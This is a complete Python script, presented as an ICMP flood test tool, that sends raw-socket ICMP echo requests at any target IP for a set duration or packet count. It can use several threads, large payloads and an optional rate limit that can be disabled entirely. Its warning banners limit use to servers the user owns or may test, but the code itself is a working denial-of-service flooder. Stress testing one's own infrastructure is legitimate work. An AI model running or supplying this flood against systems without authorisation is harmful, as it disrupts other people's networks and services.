#!/usr/bin/env python3
"""
ICMP Flood Test Tool with Duration Control
ONLY USE ON SERVERS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST
"""

import os
import sys
import socket
import struct
import time
import random
import threading
from argparse import ArgumentParser

# ICMP echo-request type code and the size of the header built by create_packet().
ICMP_ECHO_REQUEST = 8
ICMP_HEADER_SIZE = 8

# Largest ICMP payload that fits in one IPv4 datagram:
# 65535 (max datagram) - 20 (minimal IPv4 header) - 8 (ICMP header).
MAX_ICMP_PAYLOAD = 65507


def _per_second(amount, seconds):
    """Return amount / seconds, or 0.0 when no measurable time has elapsed."""
    return amount / seconds if seconds > 0 else 0.0


# Calculate ICMP checksum
def checksum(source_string):
    """Return the 16-bit Internet checksum of a bytes-like object.

    The data is summed as big-endian 16-bit words; an odd trailing byte is
    treated as the high byte of a final word padded with zero. Carries above
    16 bits are folded back in (end-around carry) and the one's complement of
    the folded sum is returned as an int in the range 0..0xFFFF, suitable for
    packing with struct format '!H'.
    """
    total = 0
    even_length = len(source_string) - (len(source_string) % 2)

    for offset in range(0, even_length, 2):
        total += (source_string[offset] << 8) | source_string[offset + 1]

    if even_length < len(source_string):
        total += source_string[-1] << 8

    # Fold until the sum fits in 16 bits. Python ints do not overflow, so no
    # carry is ever lost, however long the input is.
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)

    return ~total & 0xFFFF


# Create ICMP packet
def create_packet(id, data_size=192):
    """Create an ICMP echo request packet.

    Args:
        id: 16-bit identifier placed in the header (0..65535). The name
            shadows the builtin but is kept for interface compatibility.
        data_size: Number of random payload bytes to append.

    Returns:
        bytes: 8-byte ICMP header (type 8, code 0, checksum, id, sequence 1)
        followed by the payload.

    Raises:
        struct.error: If id does not fit in an unsigned 16-bit field.
    """
    # First pass: header with a zero checksum field, as the checksum is
    # computed over the whole message with that field zeroed.
    header = struct.pack('!BBHHH', ICMP_ECHO_REQUEST, 0, 0, id, 1)

    # Payload with random data
    data = bytes(random.randint(0, 255) for _ in range(data_size))

    chksum = checksum(header + data)

    # Repack with correct checksum
    header = struct.pack('!BBHHH', ICMP_ECHO_REQUEST, 0, chksum, id, 1)
    return header + data


# Duration-based flood function
def flood_with_duration(dest_ip, duration=30, delay=0, data_size=192, max_pps=1000, timeout=2):
    """Send ICMP echo requests to dest_ip for a fixed duration (single thread).

    Args:
        dest_ip: Target address passed to socket.sendto().
        duration: How long to keep sending, in seconds.
        delay: Fixed pause between packets in seconds; when > 0 it takes
            precedence over max_pps.
        data_size: Payload size in bytes for each packet.
        max_pps: Used only when delay is 0: the loop pauses 1/max_pps seconds
            after each packet. If both delay and max_pps are 0 (or less),
            packets are sent without pausing.
        timeout: Socket timeout in seconds.

    Exits the process with status 1 if the raw socket cannot be created due
    to missing privileges. Progress is printed about once per second and a
    summary is printed at the end.
    """
    try:
        # Create raw socket (requires root privileges)
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except PermissionError:
        print("Error: Root privileges required for raw sockets")
        sys.exit(1)
    sock.settimeout(timeout)

    # The pause between packets never changes during a run, so pick it once.
    if delay > 0:
        pause = delay
    elif max_pps > 0:
        pause = 1.0 / max_pps
    else:
        pause = 0

    sent_packets = 0
    start_time = time.time()
    end_time = start_time + duration

    print(f"Starting ICMP flood to {dest_ip}")
    print(f"Duration: {duration} seconds, Max rate: {max_pps} pps")
    print(f"Data size: {data_size} bytes, Delay: {delay}s")
    print("Press Ctrl+C to stop early")
    print("-" * 50)

    last_print = start_time
    packets_since_print = 0

    try:
        while time.time() < end_time:
            # Create packet with random ID
            packet = create_packet(random.randint(0, 65535), data_size)

            # The port number is not meaningful for raw ICMP sockets.
            sock.sendto(packet, (dest_ip, 1))
            sent_packets += 1
            packets_since_print += 1

            current_time = time.time()

            # Print progress every second
            if current_time - last_print >= 1.0:
                elapsed = current_time - start_time
                remaining = end_time - current_time
                current_rate = packets_since_print / (current_time - last_print)
                avg_rate = _per_second(sent_packets, elapsed)

                print(f"Elapsed: {elapsed:5.1f}s | "
                      f"Remaining: {remaining:5.1f}s | "
                      f"Packets: {sent_packets:6d} | "
                      f"Rate: {current_rate:6.1f} pps (avg: {avg_rate:6.1f} pps)")

                last_print = current_time
                packets_since_print = 0

            if pause > 0:
                time.sleep(pause)

    except KeyboardInterrupt:
        print("\nStopped by user")
    except socket.error as e:
        print(f"Socket error: {e}")
    except Exception as e:
        print(f"Unexpected error: {e}")
    finally:
        sock.close()

    total_time = time.time() - start_time
    total_bytes = sent_packets * (data_size + ICMP_HEADER_SIZE)

    print("\n" + "=" * 60)
    print("FLOOD TEST COMPLETED")
    print("=" * 60)
    print(f"Target: {dest_ip}")
    print(f"Duration requested: {duration} seconds")
    print(f"Actual duration: {total_time:.2f} seconds")
    print(f"Total packets sent: {sent_packets}")
    print(f"Total bytes sent: {total_bytes}")
    print(f"Average rate: {_per_second(sent_packets, total_time):.1f} packets/second")
    print(f"Average bitrate: {_per_second(total_bytes * 8, total_time) / 1000:.1f} kbps")


# Multi-threaded duration-based flood
def threaded_duration_flood(dest_ip, duration=30, threads=5, data_size=192, max_pps=1000):
    """Send ICMP echo requests from several threads for a fixed duration.

    Args:
        dest_ip: Target address passed to socket.sendto().
        duration: How long to keep sending, in seconds.
        threads: Number of worker threads; each opens its own raw socket.
        data_size: Payload size in bytes for each packet.
        max_pps: Overall pacing budget shared by all workers. Each worker
            pauses threads/max_pps seconds after every packet. A value of 0
            (or less) disables pacing.

    The calling thread prints progress about once per second, stops early on
    Ctrl+C or when no worker is alive any more, and prints a summary with
    per-thread counts at the end.
    """
    # One slot per worker; each worker only ever writes its own slot.
    sent_packets = [0] * threads
    stop_event = threading.Event()

    # True division keeps the limit in force even when max_pps < threads;
    # integer division would yield 0 there and switch pacing off entirely.
    min_interval = threads / max_pps if max_pps > 0 else 0

    def worker(thread_id, end_time):
        """Worker function for each thread"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
        except OSError as e:
            # Nothing to close if the socket was never created.
            print(f"Thread {thread_id} error: {e}")
            return

        try:
            while not stop_event.is_set() and time.time() < end_time:
                packet = create_packet(random.randint(0, 65535), data_size)
                sock.sendto(packet, (dest_ip, 1))
                sent_packets[thread_id] += 1

                if min_interval > 0:
                    # Returns early if a stop is requested during the pause.
                    stop_event.wait(min_interval)
        except Exception as e:
            # Thread boundary: report the failure instead of dying silently.
            print(f"Thread {thread_id} error: {e}")
        finally:
            sock.close()

    start_time = time.time()
    end_time = start_time + duration
    thread_list = []

    print(f"Starting multi-threaded ICMP flood to {dest_ip}")
    print(f"Duration: {duration} seconds, Threads: {threads}")
    print(f"Data size: {data_size} bytes, Max PPS: {max_pps}")
    print("Press Ctrl+C to stop early")
    print("-" * 50)

    # Start worker threads
    for i in range(threads):
        thread = threading.Thread(target=worker, args=(i, end_time))
        thread.daemon = True
        thread_list.append(thread)
        thread.start()

    # Progress monitoring in main thread
    last_print = start_time
    try:
        while time.time() < end_time:
            # Stop waiting once every worker has exited (for example when
            # none of them could open a raw socket).
            if not any(thread.is_alive() for thread in thread_list):
                break

            current_time = time.time()
            if current_time - last_print >= 1.0:
                elapsed = current_time - start_time
                remaining = end_time - current_time
                total_sent = sum(sent_packets)
                current_rate = _per_second(total_sent, elapsed)

                print(f"Elapsed: {elapsed:5.1f}s | "
                      f"Remaining: {remaining:5.1f}s | "
                      f"Packets: {total_sent:6d} | "
                      f"Rate: {current_rate:6.1f} pps | "
                      f"Threads: {threads}")

                last_print = current_time

            time.sleep(0.1)  # Small sleep to reduce CPU usage

    except KeyboardInterrupt:
        print("\nStopping threads...")
    finally:
        stop_event.set()

    # Wait for all threads to finish
    for thread in thread_list:
        thread.join(timeout=1.0)

    total_time = time.time() - start_time
    total_packets = sum(sent_packets)
    total_bytes = total_packets * (data_size + ICMP_HEADER_SIZE)

    print("\n" + "=" * 60)
    print("MULTI-THREADED FLOOD TEST COMPLETED")
    print("=" * 60)
    print(f"Target: {dest_ip}")
    print(f"Duration requested: {duration} seconds")
    print(f"Actual duration: {total_time:.2f} seconds")
    print(f"Threads used: {threads}")
    print(f"Total packets sent: {total_packets}")
    print(f"Total bytes sent: {total_bytes}")
    print(f"Average rate: {_per_second(total_packets, total_time):.1f} packets/second")
    print(f"Average bitrate: {_per_second(total_bytes * 8, total_time) / 1000:.1f} kbps")

    # Show per-thread statistics
    print("\nPer-thread statistics:")
    for i, count in enumerate(sent_packets):
        print(f"  Thread {i}: {count} packets")


# Original packet-count based function (for compatibility)
def send_icmp_flood(dest_ip, packet_count=1000, delay=0, data_size=192, timeout=2):
    """Send a fixed number of ICMP echo requests (original function).

    Args:
        dest_ip: Target address passed to socket.sendto().
        packet_count: Number of packets to send.
        delay: Pause between packets in seconds (0 means no pause).
        data_size: Payload size in bytes for each packet.
        timeout: Socket timeout in seconds.

    Exits the process with status 1 if the raw socket cannot be created due
    to missing privileges.
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except PermissionError:
        print("Error: Root privileges required for raw sockets")
        sys.exit(1)
    sock.settimeout(timeout)

    sent_packets = 0
    start_time = time.time()

    print(f"Starting ICMP flood to {dest_ip}")
    print(f"Packets: {packet_count}, Delay: {delay}s, Data size: {data_size} bytes")

    try:
        for i in range(packet_count):
            packet = create_packet(random.randint(0, 65535), data_size)
            sock.sendto(packet, (dest_ip, 1))
            sent_packets += 1

            # Progress indicator: report packets actually sent so far, not
            # the zero-based loop index.
            if i % 100 == 0:
                rate = _per_second(sent_packets, time.time() - start_time)
                print(f"Sent {sent_packets}/{packet_count} packets ({rate:.1f} pkt/s)")

            if delay > 0:
                time.sleep(delay)

    except KeyboardInterrupt:
        print("\nStopped by user")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        sock.close()

    total_time = time.time() - start_time
    print(f"\nCompleted: {sent_packets} packets sent in {total_time:.2f} seconds")
    print(f"Average rate: {_per_second(sent_packets, total_time):.1f} packets/second")


def main():
    """Parse command-line arguments, validate them and run the selected mode.

    Mode selection: --count selects the legacy packet-count mode; otherwise
    --threads > 1 selects the multi-threaded duration mode; otherwise the
    single-threaded duration mode is used.
    """
    parser = ArgumentParser(description='ICMP Flood Test Tool with Duration Control')
    parser.add_argument('target', help='Target IP address')

    # Duration-based arguments
    parser.add_argument('--duration', type=int, default=30,
                        help='Duration in seconds (default: 30)')
    parser.add_argument('--max-pps', type=int, default=1000,
                        help='Maximum packets per second (default: 1000)')

    # Threading arguments
    parser.add_argument('--threads', type=int, default=1,
                        help='Number of threads (default: 1)')

    # Packet configuration arguments
    parser.add_argument('--size', type=int, default=192,
                        help='Data payload size in bytes (default: 192)')
    parser.add_argument('--delay', type=float, default=0,
                        help='Delay between packets in seconds (overrides max-pps)')

    # Legacy packet-count arguments
    parser.add_argument('-c', '--count', type=int, default=None,
                        help='Number of packets to send (legacy, use --duration instead)')

    args = parser.parse_args()

    # Reject values that would otherwise be silently misinterpreted (for
    # example a negative --max-pps behaving like "no limit").
    if args.duration < 0:
        parser.error('--duration must not be negative')
    if args.max_pps < 0:
        parser.error('--max-pps must not be negative (use 0 to disable the limit)')
    if args.threads < 1:
        parser.error('--threads must be at least 1')
    if not 0 <= args.size <= MAX_ICMP_PAYLOAD:
        parser.error(f'--size must be between 0 and {MAX_ICMP_PAYLOAD}')
    if args.delay < 0:
        parser.error('--delay must not be negative')
    if args.count is not None and args.count < 0:
        parser.error('--count must not be negative')

    # Warning message
    print("=" * 70)
    print("ICMP FLOOD TEST TOOL - DURATION CONTROL")
    print("ONLY USE ON SERVERS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST")
    print("UNAUTHORIZED USE MAY BE ILLEGAL")
    print("=" * 70)

    # os.geteuid is not available on every platform, so look it up defensively.
    geteuid = getattr(os, 'geteuid', None)
    if geteuid is not None and geteuid() != 0:
        print("Warning: Root privileges recommended for raw sockets")
        print("Run with: sudo python3 script.py ")
        print()

    # Choose execution mode
    if args.count is not None:
        # Legacy packet-count mode
        print("Using legacy packet-count mode (consider using --duration instead)")
        send_icmp_flood(args.target, args.count, args.delay, args.size)
    elif args.threads > 1:
        # Multi-threaded duration mode
        if args.delay > 0:
            print("Note: --delay is ignored in multi-threaded mode; pacing uses --max-pps")
        threaded_duration_flood(args.target, args.duration, args.threads,
                                args.size, args.max_pps)
    else:
        # Single-threaded duration mode
        flood_with_duration(args.target, args.duration, args.delay,
                            args.size, args.max_pps)


if __name__ == '__main__':
    main()